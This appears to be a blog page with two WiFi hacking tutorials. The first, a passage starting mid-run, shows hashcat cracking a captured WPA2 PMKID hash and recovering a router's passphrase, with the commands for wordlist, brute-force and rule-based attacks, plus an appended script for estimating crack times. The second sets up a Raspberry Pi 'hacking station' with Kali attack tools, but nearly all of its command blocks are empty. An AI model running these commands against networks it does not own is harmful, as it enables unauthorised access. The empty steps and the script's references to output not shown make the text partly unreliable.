Hash.Target......: 17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c4988...47487a
Time.Started.....: Fri Jan 18 23:12:55 2019 (27 secs)
Time.Estimated...: Fri Jan 18 23:13:22 2019 (0 secs)
Guess.Base.......: File (wordlist\rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   268.6 kH/s (51.75ms) @ Accel:512 Loops:128 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 11008839/14344384 (76.75%)
Rejected.........: 3636039/11008839 (33.03%)
Restore.Point....: 10261572/14344384 (71.54%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: aldohizo123 -> Juelle98
Hardware.Mon.#1..: Temp: 68c Fan: 43% Util: 95% Core:1847MHz Mem:4006MHz Bus:16

Started: Fri Jan 18 23:12:48 2019
Stopped: Fri Jan 18 23:13:24 2019

C:\hashcat-5.1.0>

Here we can see that the cracked password is “adsladsl” for the Technicolor router.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 HonnyP02.16800 "wordlist\rockyou.txt" --show
17a40e5b92e3815f6111554b1c80f4d9*c4ea1d1f7d93*c498808d7d5f*4c656f6e20322e342047487a:adsladsl

C:\hashcat-5.1.0>

Extra: Brute Force Attack And Rule based attack

You can let hashcat brute-force the file with the command below.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 HonnyP02.16800 ?l?l?l?l?l?l?l?l

Or use a rule-based attack.

C:\hashcat-5.1.0>hashcat64 -m 16800 -w 3 -r rules\best64.rule HonnyP02.16800 "wordlist\rockyou.txt"
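As an added example (not part of the original guide), this Python script turns the figures from these runs into the numbers a defender needs when judging a WiFi passphrase: it parses the -m 2500 and -m 16800 output lines shown above, works out the smallest hashcat mask that covers a recovered passphrase, and estimates how long that mask, or the rockyou wordlist, takes to exhaust at the 268.6 kH/s observed here. The charset sizes are hashcat's documented built-ins; the rate and wordlist size are taken from the output on this page.

```python
from __future__ import annotations
import math

# hashcat's built-in mask charsets and their sizes (as documented by the tool)
CHARSET_SIZE = {"?l": 26, "?u": 26, "?d": 10, "?s": 33, "?a": 95}

# Figures taken from the runs shown in this guide
ROCKYOU_WORDS = 14_344_384   # "Passwords.: 14344384"
OBSERVED_RATE = 268_600      # "268.6 kH/s" on the -m 16800 run

def mask_keyspace(mask: str) -> int:
    """Candidates produced by a hashcat -a 3 mask such as '?l?l?l?l?l?l?l?l'."""
    tokens = [mask[i:i + 2] for i in range(0, len(mask), 2)]
    if any(t not in CHARSET_SIZE for t in tokens):
        raise ValueError(f"unsupported mask token in {mask!r}")
    return math.prod(CHARSET_SIZE[t] for t in tokens)

def seconds_to_exhaust(keyspace: int, rate_hps: float = OBSERVED_RATE) -> float:
    """Worst-case time for one GPU at rate_hps to try every candidate."""
    return keyspace / rate_hps

def mask_for(passphrase: str) -> str:
    """Smallest built-in-charset mask that covers the passphrase (?s for anything else)."""
    classes = {str.islower: "?l", str.isupper: "?u", str.isdigit: "?d"}
    return "".join(next((t for f, t in classes.items() if f(c)), "?s") for c in passphrase)

def parse_cracked_line(line: str) -> tuple[str, str]:
    """Return (essid, passphrase) from a hashcat.potfile or --show line.
    -m 2500 lines:  hash:ap_mac:client_mac:essid:pass
    -m 16800 lines: pmkid*ap_mac*client_mac*essid_hex:pass"""
    line = line.strip()
    if "*" in line.split(":", 1)[0]:                   # 16800 format, ESSID hex-encoded
        left, _, passphrase = line.partition(":")
        essid = bytes.fromhex(left.split("*")[3]).decode("utf-8", "replace")
    else:                                              # 2500 format, ESSID in clear
        _, _, _, essid, passphrase = line.split(":", 4)
    return essid, passphrase

def audit(line: str) -> dict:
    """Explain a recovered passphrase's exposure: wordlist time and mask-only time."""
    essid, pw = parse_cracked_line(line)
    mask = mask_for(pw)
    return {"essid": essid, "length": len(pw), "mask": mask,
            "mask_days": seconds_to_exhaust(mask_keyspace(mask)) / 86400,
            "rockyou_seconds": seconds_to_exhaust(ROCKYOU_WORDS)}
```

At the observed rate the whole rockyou list falls in under a minute and the 8-character lowercase mask in about nine days, while a 12-character mask over all 95 printable characters runs to billions of years, which is the quantitative version of the conclusion below.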

Conclusion

Your home or office WiFi can be hacked if you use a weak password; as always, a strong and complex password is still the best defense against an attacker.

DISCLAIMER: This software/tutorial is for educational purposes only. It should not be used for illegal activity. The author is not responsible for its use or the users action.




How To Setup A Raspbian Hacking Station On Raspberry Pi 3B+

Step 1: Download and run Raspbian Stretch Lite 4.14

1.1 Download Raspbian Stretch lite

1.2 Use Win32DiskImager or a similar application to write the image to the SD card and start the Raspberry

Step 2: Enable SSH For Remote Access

2.1 Enable SSH service



2.2 Start the ssh service



2.3 Check ssh service status



Step 3: Change Password

3.1 Change the default password “raspberry”





Step 4: Upgrade And Update The System And Install Pixel desktop

4.1 Upgrade and update Raspbian





4.2 Update dependencies



4.3 Install Pixel desktop



Step 5: Change Hostname

5.1 Edit hostname configuration file and change the name







Exit & Save

5.2 Edit the hosts configuration file







Exit & Save

5.3 Reboot the system



5.4 Confirm name change





Step 6: Configure WiFi Connection

6.1 Configure the wpa_supplicant configuration file from cli





Exit & Save

6.2 Reload the wpa_supplicant.conf configuration file



6.3 Confirm that you are connected to the WiFi network





Step 7: Enable VNC For Remote Access to Desktop

7.1 Open terminal and run raspi-config



7.2 Select Option 5 (Interfacing Options)

7.3 Then P3 VNC

7.4 Select yes to enable VNC

7.5 Wait for it to install all the necessary packages,

7.6 Reboot the Raspberry



7.7 Connect to raspberry from a VNC client

Step 8: Use Katoolin To Install Kali Linux Tools

8.1 Run commands in root privileges



8.2 Install git



8.3 Download Katoolin with git or visit the site

https://github.com/LionSec/katoolin



8.4 Make the file executable



8.5 Run Katoolin, make sure to run it as root



Step 9: Add Kali Linux Repositories And Install Attack Modules

9.1 Add the Kali repositories and update the system; navigate the menus by typing “back” or “gohome”

9.2 Install the Kali menus and exit Katoolin

9.3 Edit the sources.list and add the entry for the Kali repository so that its packages are trusted





9.4 Start Katoolin and add attack categories, weaponize the Raspberry

Step 10: Install Tools For PMKID WPA2 Attack

10.1 Install dependencies





10.2 Download hcxdumptool, hcxtools and hashcat







10.3 Install hcxdumptool



10.3.a Create the installation 



10.3.b Start the installation



10.4.a Install hcxtools



10.4.b Create the installation 



10.4.c Start the installation



10.5.a Install hashcat



10.5.b Create the installation



10.5.c Start the installation